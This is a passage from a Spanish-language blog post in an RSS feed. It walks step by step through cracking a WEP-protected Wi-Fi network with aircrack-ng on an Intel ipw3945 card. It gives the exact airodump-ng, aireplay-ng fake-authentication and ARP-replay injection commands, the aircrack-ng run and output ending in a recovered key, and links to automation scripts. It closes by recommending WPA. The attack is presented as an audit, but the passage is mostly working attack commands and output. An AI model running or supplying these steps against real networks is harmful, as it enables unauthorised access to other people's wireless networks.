<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">XX:XX:XX:XX:XX:XX&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp; &nbsp; &nbsp;<span style="color:#800000;color:#800000;">86</span>&nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#800000;color:#800000;">9</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">1</span>&nbsp; <span style="color:#800000;color:#800000;">54</span>. <span style="">WEP</span>&nbsp; WEP&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;MAGI</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; STATION&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR&nbsp; Lost&nbsp; Packets&nbsp; Probes </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Al identificar nustro objetivo debemos ejecutar el siguiente <a href="http://www.vive-libre.com/blog/etc/script.sh">script</a> para poder inyectar trafico.</p>
<p>Veremos algo asi</p>
<div class="igBar"><span id="lcode-53"><a href="#" onclick="javascript:showPlainTxt('code-53'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-53">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Indica el canal para eth1 o wifi0?</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">1</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Indica el rate de captura por defecto debe ser <span style="color:#800000;color:#800000;">2</span>”</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">2</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Indica el bssid objetivo”</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">XX:XX:XX:XX:XX:XX</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Configuracion completada, listo par inyectar” </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Empezamos a capturar los paquetes con el airodump-bg</p>
<div class="igBar"><span id="lcode-54"><a href="#" onclick="javascript:showPlainTxt('code-54'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-54">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">airodump-ng -c CANAL -w FICHERO rtap0 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y deberiamos obteneralgo asi</p>
<div class="igBar"><span id="lcode-55"><a href="#" onclick="javascript:showPlainTxt('code-55'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-55">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">CH&nbsp; <span style="color:#800000;color:#800000;">1</span> <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> BAT: <span style="color:#800000;color:#800000;">1</span> hour <span style="color:#800000;color:#800000;">38</span> mins <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> Elapsed: <span style="color:#800000;color:#800000;">48</span> s <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> <span style="color:#800000;color:#800000;">2008</span>-<span style="color:#800000;color:#800000;">03</span>-<span style="color:#800000;color:#800000;">05</span> <span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">34</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR RXQ&nbsp; Beacons&nbsp; &nbsp; #Data, #/s&nbsp; CH&nbsp; MB&nbsp; ENC&nbsp; CIPHER AUTH ESSID</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">XX:XX:XX:XX:XX:XX&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span> <span style="color:#800000;color:#800000;">100</span>&nbsp; &nbsp; &nbsp; <span style="color:#800000;color:#800000;">467</span>&nbsp; &nbsp; &nbsp; &nbsp;<span style="color:#800000;color:#800000;">47</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">1</span>&nbsp; <span style="color:#800000;color:#800000;">54</span>. <span style="">WEP</span>&nbsp; WEP&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;MAGI</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; STATION&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR&nbsp; Lost&nbsp; Packets&nbsp; Probes </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Para poder inyectar necesitamos asociarnos con el acces point.</p>
<div class="igBar"><span id="lcode-56"><a href="#" onclick="javascript:showPlainTxt('code-56'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-56">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">aireplay-ng -<span style="color:#800000;color:#800000;">1</span> <span style="color:#800000;color:#800000;">0</span> -e ESSID -a MAC_PUNTODEACCESO -h NUESTRAMAC eth1 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<div class="igBar"><span id="lcode-57"><a href="#" onclick="javascript:showPlainTxt('code-57'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-57">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Waiting for beacon frame <span style="color:#006600; font-weight:bold;">&#40;</span>BSSID: XX:XX:XX:XX:XX:XX<span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Sending Authentication Request</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Authentication successful</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Sending Association Request</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">32</span>&nbsp; Association successful :-<span style="color:#006600; font-weight:bold;">&#41;</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Ya que estamos asociados, podemos inyectar para poder generar DATA que son los paquetes que nos interesan</p>
<div class="igBar"><span id="lcode-58"><a href="#" onclick="javascript:showPlainTxt('code-58'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-58">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">aireplay-ng -<span style="color:#800000;color:#800000;">3</span> -b MAC_PUNTODEACCESO -h -h NUESTRAMAC eth1 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>En unos cuantos segundos podemos ver como genero unos miles de DATA</p>
<div class="igBar"><span id="lcode-59"><a href="#" onclick="javascript:showPlainTxt('code-59'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-59">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Saving ARP requests in replay_arp-<span style="color:#800000;color:#800000;">0305</span>-<span style="color:#800000;color:#800000;">215511</span>.<span style="">cap</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">You should also start airodump-ng to capture replies.</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">Read</span> <span style="color:#800000;color:#800000;">16339</span> packets <span style="color:#006600; font-weight:bold;">&#40;</span>got <span style="color:#800000;color:#800000;">8045</span> ARP requests<span style="color:#006600; font-weight:bold;">&#41;</span>, sent <span style="color:#800000;color:#800000;">8042</span> packets...<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#800000;color:#800000;">333</span> pps<span style="color:#006600; font-weight:bold;">&#41;</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Esperamos alrededor de 10 min para obtener una buena cantidad de DATA, el tiempo puede variar segun la distancia a la que te encuentres del acces point, no hay una cantidad exacta pero entre 200 300 mil DATA son suficientes segun lo comprobado.</p>
<p>Ahora solo  hay que pasar el fichero por el aircrack</p>
<div class="igBar"><span id="lcode-60"><a href="#" onclick="javascript:showPlainTxt('code-60'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-60">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">aircrack-ng FICHERO.<span style="">cap</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y listo</p>
<div class="igBar"><span id="lcode-61"><a href="#" onclick="javascript:showPlainTxt('code-61'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-61">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Aircrack-ng <span style="color:#800000;color:#800000;">0</span>.<span style="color:#800000;color:#800000;">9</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#800000;color:#800000;">00</span>:<span style="color:#800000;color:#800000;">00</span>:<span style="color:#800000;color:#800000;">01</span><span style="color:#006600; font-weight:bold;">&#93;</span> Tested <span style="color:#800000;color:#800000;">1</span> keys <span style="color:#006600; font-weight:bold;">&#40;</span>got <span style="color:#800000;color:#800000;">552366</span> IVs<span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">KB&nbsp; &nbsp; depth&nbsp; &nbsp;byte<span style="color:#006600; font-weight:bold;">&#40;</span>vote<span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">39</span><span style="color:#006600; font-weight:bold;">&#40;</span> <span style="color:#800000;color:#800000;">100</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">11</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">33</span><span style="color:#006600; font-weight:bold;">&#41;</span> D6<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">15</span><span style="color:#006600; font-weight:bold;">&#41;</span> 6C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">13</span><span style="color:#006600; font-weight:bold;">&#41;</span> 6D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> 0D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">11</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">17</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">9</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">95</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> 5D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">76</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">93</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> D0<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">00</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">4</span><span style="color:#006600; font-weight:bold;">&#41;</span> 0C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">4</span><span style="color:#006600; font-weight:bold;">&#41;</span> 3A<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">3</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">93</span><span style="color:#006600; font-weight:bold;">&#40;</span> <span style="color:#800000;color:#800000;">100</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">03</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">37</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">06</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">31</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">83</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">13</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">39</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> B3<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> D4<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">02</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">11</span><span style="color:#006600; font-weight:bold;">&#41;</span> CC<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> FD<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">7</span><span style="color:#006600; font-weight:bold;">&#41;</span> 6C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">86</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> D2<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">30</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">4</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">2</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#40;</span> <span style="color:#800000;color:#800000;">121</span><span style="color:#006600; font-weight:bold;">&#41;</span> 1B<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">15</span><span style="color:#006600; font-weight:bold;">&#41;</span> CE<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> EB<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> 2C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">9</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">41</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">82</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> CD<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">00</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">15</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> 1A<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> 2B<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">34</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">39</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> A2<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">3</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">94</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">88</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">18</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">20</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">78</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">18</span><span style="color:#006600; font-weight:bold;">&#41;</span> D8<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">17</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">16</span><span style="color:#006600; font-weight:bold;">&#41;</span> D0<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">16</span><span style="color:#006600; font-weight:bold;">&#41;</span> 0D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">10</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">83</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">9</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">69</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">75</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">82</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> A0<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">41</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">46</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> A2<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">KEY FOUND! <span style="color:#006600; font-weight:bold;">&#91;</span> <span style="color:#800000;color:#800000;">39</span>:<span style="color:#800000;color:#800000;">93</span>:<span style="color:#800000;color:#800000;">19</span>:<span style="color:#800000;color:#800000;">94</span>:<span style="color:#800000;color:#800000;">35</span> <span style="color:#006600; font-weight:bold;">&#93;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Decrypted correctly: <span style="color:#800000;color:#800000;">100</span>% </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Todo esto se puede hacer de forma mas simple, con el <a href="http://vive-libre.com/blog/etc/airoway.sh">airoway.sh</a> solo hay que editar la interfas de injecion segun sea nuestro caso, que puede ser wifi0 o eth1</p>
<div class="igBar"><span id="lcode-62"><a href="#" onclick="javascript:showPlainTxt('code-62'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-62">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">LISTEN=<span style="color:#CC0000;">"rtap0"</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">INJECT=<span style="color:#CC0000;">"eth1"</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Como podemos ver, el cifrado WEP no es suficiente para la proteccion de nuestra redes wireless, no exponga la integridad de su red, y utilecen WPA.</p>
<p>Espero le haya sido de utilidad.</p>
<p>Referencias:</p>
<p>http://aircrack-ng.org/doku.php?id=ipw3945</p>
<p>http://seguridadwireless.net</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/feed/</wfw:commentRss>
		<slash:comments>91</slash:comments>
		</item>
	</channel>
</rss>
